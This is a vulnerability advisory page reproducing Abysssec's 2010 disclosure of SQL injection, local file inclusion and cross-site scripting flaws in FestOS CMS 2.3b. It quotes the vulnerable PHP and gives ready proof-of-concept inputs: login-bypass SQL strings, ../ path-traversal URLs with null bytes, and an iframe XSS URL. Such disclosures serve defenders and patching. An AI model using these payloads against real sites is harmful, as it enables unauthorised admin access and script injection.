FestOS CMSs 2.3bd cross site scripting, local file inclusiond, SQL injection

2010.09.13
Credit: abysssec
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < Day 9 (0day) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-9-festos-cms-2-3b-multiple-remote-vulnerabilities/ ''' Title : FestOS CMS 2.3b Multiple Remote Vulnerabilities Affected Version : <=2.3b Vendor Site : http://festengine.org/ Discovery : abysssec.com Description : This CMS have many critical vulnerability that we refere to some of those here: Vulnerabilites : 1- SQL Injection Vulnerability : 1.1- in admin/do_login.php line 17: // Process the login $query = "SELECT userid, roleID, username FROM ".$config['dbprefix']."users WHERE LCASE(username) = '".strtolower($_POST['username'])."' and password ='".md5($_POST['password'])."'"; $res = $festos->query($query); poc: in admin.php page: username: admin' or '1'='1 password: admin' or '1'='1 1.2- in festos_z_dologin.php: $query = "SELECT vendorID FROM ".$config['dbprefix']."vendors WHERE LCASE(email) = '".strtolower($_POST['email'])."' and password ='".$_POST['password']."'"; poc: in applications.php page: email: anything pass: a' or 1=1/* 2- Local File Inclusion (lfi): Vulnerability in index.php: line 41: if(isset($_GET['theme']) && !empty($_GET['theme']) && file_exists($config['ABSOLUTE_FILE_PATH'].'themes/'.$_GET['theme'])) { ... require_once($themepath.'/includes/header.php'); poc: http://localhost/festos/index.php?theme=../admin/css/admin.css%00 http://localhost/festos/artists.php?theme=../admin/css/admin.css%00 http://localhost/festos/contacts.php?theme=../admin/css/admin.css%00 http://localhost/festos/applications.php?theme=../admin/css/admin.css%00 http://localhost/festos/entertainers.php?theme=../admin/css/admin.css%00 http://localhost/festos/exhibitors.php?theme=../admin/css/admin.css%00 http://localhost/festos/foodvendors.php?theme=../admin/css/admin.css%00 http://localhost/festos/performanceschedule.php?theme=../admin/css/admin.css%00 http://localhost/festos/sponsors.php?theme=../admin/css/admin.css%00 http://localhost/festos/winners.php?theme=../admin/css/admin.css%00 3- Cross Site Scripting: in foodvendors.php, festos_foodvendors.php page has been included. lines 31-36. switch($switcher) { case 'details': if(!isset($_GET['vendorID']) || ctype_digit($_GET['vendorID'])===FALSE || $_GET['vendorID'] == '') { $template = 'foodvendors_nonespecified.tpl'; break; } and in line 74: $tpl->set('vType', $_GET['category']); and foodvendors_nonespecified.tpl line 123: <p>Back to the list of <a href="<?php echo $_SERVER['PHP_SELF'];?>?view=list&vTypeID=<?php echo $vTypeID;?>" title="<?php echo $vType;?> Category">exhibitors in the <?php echo $vType;?> category</a>.</p> the category parameter is vulnerable to xss: poc: http://localhost/festos/foodvendors.php?view=details&vendorID=4&category=%3Ciframe%20src=javascript:alert%28%22XSS%22%29;&vTypeID=28


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top